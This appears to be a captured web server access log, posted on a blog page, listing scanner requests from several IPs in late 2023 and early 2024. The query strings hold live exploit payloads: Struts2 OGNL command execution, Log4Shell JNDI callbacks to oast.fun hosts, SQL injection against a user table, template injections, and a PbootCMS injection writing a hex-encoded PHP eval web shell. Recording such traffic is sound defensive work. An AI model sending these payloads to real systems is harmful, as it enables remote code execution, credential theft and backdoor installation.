| 2023/11/28 | 5:57:49 | 221.150.72.75 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/11/28 | 5:57:50 | 221.150.72.75 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/11/28 | 5:57:51 | 221.150.72.75 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 |
| 2023/11/28 | 5:57:51 | 221.150.72.75 | search==%00{.cookie|0I9sin|value%3dCVE-2014-6287.} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/28 | 5:57:51 | 221.150.72.75 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/11/28 | 5:58:11 | 221.150.72.75 | id=h0zvon%25{128*128} | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 |
| 2023/12/3 | 7:43:53 | 27.151.28.177 | search==%00{.cookie|kz2ikd|value%3dCVE-2014-6287.} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 |
| 2023/12/3 | 14:32:36 | 27.151.28.177 | uri={{228*|98|}} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/12/3 | 14:32:36 | 27.151.28.177 | uri={{228*|98|}} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/12/3 | 21:39:17 | 27.151.28.177 | url=%23{T(java.net.InetAddress).getByName(|clm1u763dlueb6ql2mig5wy17uhz8549f.oast.fun|)}&mgrDn=a&pwd=a | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 |
| 2023/12/3 | 23:25:17 | 27.151.28.177 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 |
| 2023/12/3 | 8:06:47 | 27.151.28.177 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/12/3 | 8:18:07 | 27.151.28.177 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 |
| 2023/12/3 | 10:30:19 | 27.151.28.177 | id=XNLiHe%25{128*128} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/12/3 | 14:39:11 | 27.151.28.177 | _tn={{trimprefix(base64_decode(httoken), | Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 |
| 2023/12/3 | 17:41:10 | 27.151.28.177 | x=${jndi:ldap://${:-348}${:-463}.${hostName}.uri.clm1u763dlueb6ql2migj4girubh9go1w.oast.fun/a} | Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 |
| 2023/12/3 | 18:35:29 | 27.151.28.177 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/4 | 7:56:36 | 27.151.28.177 | username=${jndi:ldap://${:-473}${:-419}.${hostName}.username.clm1u763dlueb6ql2migj8qxxk3muchmw.oast.fun/test}&url=https://localhost | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 |
| 2023/12/4 | 9:43:31 | 27.151.28.177 | id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/12/4 | 9:57:34 | 27.151.28.177 | {alert(document.domain)} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/12/4 | 10:48:27 | 27.151.28.177 | FSMSCommand=${jndi:ldap://${:-841}${:-338}.${hostName}.username.clm1u763dlueb6ql2migizo6mry65pjjc.oast.fun/buqEY} | Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/12/4 | 11:40:43 | 27.151.28.177 | room=${jndi:ldap://${:-655}${:-980}.${hostName}.username.clm1u763dlueb6ql2mige5gh644fqqhmt.oast.fun/gkt5c} | Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 |
| 2023/12/4 | 12:14:53 | 27.151.28.177 | url=${jndi:ldap://${:-794}${:-487}.${hostName}.url.clm1u763dlueb6ql2migtqkes49jmagfo.oast.fun} | Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/4 | 12:35:15 | 27.151.28.177 | =${jndi:ldap://${:-251}${:-252}.${hostName}.username.clm1u763dlueb6ql2migsyc5zciqrk7cw.oast.fun/8p3sZ} | Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 |
| 2023/12/26 | 14:45:56 | 222.112.82.143 | mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/12/26 | 14:45:56 | 222.112.82.143 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 |
| 2023/12/26 | 14:45:57 | 222.112.82.143 | clientId={{id}}&timeout=500&wiki=xwiki | Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F |
| 2023/12/26 | 14:45:55 | 222.112.82.143 | cat_id=${system(ls)} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test | Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} | Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | id=KfT5hO%25{128*128} | Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 |
| 2023/12/26 | 14:45:54 | 222.112.82.143 | search==%00{.cookie|RdkeZJ|value%3dCVE-2014-6287.} | Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 |
| 2023/12/26 | 14:45:55 | 222.112.82.143 | redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{|sh|,|-c|,|id|})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} | |
| 2024/1/4 | 20:07:38 | 202.61.85.92 | member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653e | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 |
| 2024/1/4 | 20:10:44 | 202.61.85.92 | member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653e | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 |
| 2024/1/4 | 20:16:51 | 202.61.85.92 | member/login/aaaaaa}{pboot:if(true);use/*|function/*|fputs/*|as/*|test;use/*|function/*|fopen/*|as/*|test1;use/*|function/*|get/*|as/*|test3;use/*|function/*|hex2bin/*|as/*|test4;test(test1(test3(|file|),|w|),test4(test3(|content|)));if(true)}{/pboot:if}&file=xm117.php&content=63346361343233386130623932333832306463633530396136663735383439623c7072653e3c626f64793e3c3f70687020636c617373204763453439334636207b207075626c69632066756e6374696f6e205f5f636f6e73747275637428244879354637297b20406576616c28222f2a5a4263363436395631382a2f222e2448793546372e2222293b207d7d6e657720476345343933463628245f524551554553545b2770617373275d293b6563686f206572726f723330333f3e3c2f626f64793e3c2f7072653e | Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 |
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
